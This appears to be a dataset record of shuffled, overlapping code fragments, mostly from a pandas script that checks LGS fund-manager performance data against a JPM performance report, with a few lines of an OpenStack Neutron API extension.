exts.append(ex) return exts def update_attributes_map(self,", "def get_updated(self): return '2016-03-15T09:00:00-08:00' @classmethod def get_resources(cls): \"\"\"Returns Ext Resources.\"\"\" my_plurals = [(key,", "import ExtensionDescriptor from neutron.api import extensions from neutron.api.v2 import attributes as attr from", "'', 'validate': { 'type:boolean': None } }, 'offloading_modes': { 'allow_post': True, 'allow_put': True,", "'current_speed': { 'allow_post': True, 'allow_put': True, 'is_visible': True, 'default': '', 'validate': { 'type:non_negative':" ]
[]
[ "'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } )", "accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check", "pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed:", "set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts but are", "= df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm", "ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to", "sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0,", "accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during", "table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1',", "'84_Return': '7 Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants", "'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date =", "but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set", "pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'],", "df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market", "pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn))", "Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1", "# Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads", "pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) #", "= pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm =", "values from JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge(", "deviants = [] columns = [] deviations = [] jpm_missing = [] lgs_missing", "= 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD", "set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'})", "checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} #", "sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict =", "8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', }", "import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath =", "1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM", "Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM", "Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items =", "Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing", "jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for", "been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are", "columns = [] deviations = [] jpm_missing = [] lgs_missing = [] total_count", "INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict", "df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1", "are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ',", "i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01:", "# jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, #", "df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints", "fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing", "= pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O',", "= 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads", "# df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) #", "# Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS", "lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) #", "accounts but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set -", ") df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan)", "are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set -", "pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix", "df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict =", "Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm", "', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have been", "[] deviations = [] jpm_missing = [] lgs_missing = [] total_count = 0", "} for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet,", "'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year',", "# df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True)", "= pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={", "= lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open", "# Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results", "'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page", "df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set", "Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing", "JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap,", "Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return':", "open accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) #", "'JPM ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={", "jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count = 0 for", "'5 Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations =", "df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0", "check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations = []", "'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the", "set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked. lgs_check_set =", "= df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values from", "df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x':", "NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF':", "liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set =", "pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame()", "lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True)", "and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column", "left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\", "0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if", "1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap", "11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS", "deviant check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations =", "5, 31) # End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath)", "# right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ #", "= pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', #", "pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy =", "df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm =", "# df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath", "print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') #", "2': 'JPM ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename(", "from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant", "LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath),", "(df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items", "in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] =", "been completely missed. # Creates set containing fund managers that are currently open", "# jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames:", "= df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later", "Creates set containing fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS", "managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund", "filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], #", "sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4':", "'%') # Checks for managers that have been completely missed. # Creates set", "'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8': df_sheet =", "# Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict =", "strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set =", "By ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath =", "Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap =", "== 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix", "lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts", "not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan}", "# Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns =", "lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked.", "+ filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1],", "datetime as dt import numpy as np import pandas as pd # START", ">= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])):", "during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants", "header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = {", "ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/'", "Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity =", "'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet =", "print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet", "= [] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count =", "jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix =", "# .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], #", "'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet", "} ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-',", "Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from", "ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm =", "1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page", "Creates set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) #", "containing fund managers that are open accounts but are not checked. df_lgs_missing_completely =", "if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i]))", "[] for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else:", "= dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap", "Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return':", "'7 Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants =", "checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open", "= 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename", "= deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) #", "df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values from JPM", "'1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } #", "df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' )", "Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] =", "= pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm =", "deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates", "from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations,", "# End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads", "pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS", "df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) #", "df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity", "= { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return':", "pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True)", "lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts", "df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], #", "= df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy", "left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) #", "= df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes", "df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers =", "column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] =", "'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet],", "0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False)", "import datetime as dt import numpy as np import pandas as pd #", "sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet =", "df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] #", "jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1',", "df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing =", "df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager']))", "All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) #", "check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n')", "= pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing =", "'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been", "Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF':", "[] columns = [] deviations = [] jpm_missing = [] lgs_missing = []", "set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'})", "lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months',", "End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS", "df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund", "# left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager', 'Date'])\\", "deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have been completely", "containing fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open", "lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from LGS. print('\\nMissing", "'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return':", "# df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0", "= 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in", "# ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp],", "'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath),", "Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5,", "[] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count = 0", "df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set", "set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates", "pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap =", "Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5", "INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New", "that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP,", "(not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names", "column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return':", "columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing,", "= 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End", "np import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath", "columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', }", "df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column'])", "df_deviations = pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing", "pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'],", "# for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp", "= dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table df_lgs", "# Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3", "# START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx'", ") # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False)", "# Merges the market values from JPM IAP with JPM HTS # df_jpm_main", "= [] lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn,", "left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # 